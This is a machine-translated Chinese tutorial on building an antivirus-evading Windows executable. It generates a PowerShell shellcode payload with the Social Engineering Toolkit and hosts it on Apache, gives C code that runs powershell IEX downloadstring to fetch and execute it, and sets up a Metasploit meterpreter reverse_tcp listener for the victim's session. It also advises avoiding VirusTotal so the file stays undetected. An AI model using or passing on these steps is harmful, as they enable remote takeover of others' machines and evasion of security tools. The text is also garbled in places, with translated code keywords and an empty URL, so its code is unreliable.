龙空技术网

使用Powershell和Metasploit绕过防病毒

科技之先一米阳光 371

前言:

现在我们对“apache 根目录”都比较关注,各位老铁们都想要分析一些“apache 根目录”的相关内容。那么小编在网摘上汇集了一些有关“apache 根目录””的相关文章,希望你们能喜欢,你们快快来了解一下吧!

测试你自己的病毒

你需要的东西:

Kali Linux一个'C'编译器(我在Windows上使用gcc,我似乎无法使kali版本正常工作)社会工程工具包(预装在kali上)Apache Webserver (预装在kali上)Metasploit框架(也预装在kali上)

创建Powershell有效负载

我们将使用Social Engineering Toolkit来创建powershell有效负载。要打开它,请在控制台中键入:

setoolkit

从那里,输入1表示“社会工程攻击”,然后输入9表示“powershell攻击向量”,最后输入1表示“powershell字母数字shellcode注入器”。

现在,你需要提供一个“LHOST”。如果您还不知道,这是您的攻击者计算机的本地IP地址(只要您攻击局域网)。要确定它,请打开一个新的终端窗口并输入:

使用ifconfig

向上滚动以查找连接到网络的界面(在我的情况下,即“eth0”)。找到我突出显示的内容,“inet”,然后在它旁边找到你的本地IP地址(在我的例子中,它是10.0.0.13)。这是您为LHOST输入的内容。

接下来,它会提示您输入“反向端口”。它指的是“LPORT”。通常,我使用“4444”作为仪表预设,但只要你记得它就可以使用你想要的任何端口。

然后它会提示您是否要“立即启动监听器”。输入“否”,我们稍后会手动执行此操作。现在我们已经完成了SET。

现在我们需要将有效负载移动到我们的apache webserver。为此,请打开终端并键入:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt

但是,如果您仍在使用Kali Linux 1(而不是2),请使用以下命令:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt

这是因为,在Kali Linux版本2中,apache根目录被移动到/ var / www /中的“html”文件夹。

现在,只需输入:

service apache2 start

...并且应该启动您的网络服务器。

第2步

创建病毒

要创建病毒,我使用的是Windows记事本和MinGW的“gcc”。该病毒的代码如下:

#include <stdio.h>

main()

{

system(“powershell.exe \”IEX((new-object net.webclient).downloadstring(''))\“” );

返回0;

}

请记住更改“10.0.0.13”,因为您的LHOST(或本地IP地址)可能会有所不同。

将其保存为“evil.c”,然后使用您喜欢的c编译器进行编译。就我而言,我正在使用gcc,所以我输入:

gcc.exe D:\ Hacking \ evil.c -o D:\ Hacking \ evil.exe

现在我们有了FUD(“完全不可检测”)的可执行文件。

步骤3

设置监听器

最后,我们需要设置一个监听器来等待一个meterpreter会话。键入以下命令启动metasploit框架:

msfconsole

加载后,键入:

使用multi / handler

现在,您需要输入一系列选项,以便我们为您列出:

设置PAYLOAD windows / meterpreter / reverse_tcp设置LHOST 10.0.0.13设置LPORT 4444

再次,记得要LHOST改变你的本地IP地址,并更改LPORT如果你使用其他的东西比4444。

最后,输入“exploit”并按Enter键启动监听器。一旦您的受害者运行“evil.exe”病毒,您将获得一个会话。

而已!

如果您想针对防病毒检查您的可执行文件,我建议您不要使用VirusTotal。这是因为他们将签名提交给防病毒公司 - 增加了检测可执行文件的可能性。相反,我个人使用nodistribute.com,因为如果他们遵守诺言,签名就不会被提交。如果您有兴趣,以下是我的可执行文件的结果:

标签: #apache 根目录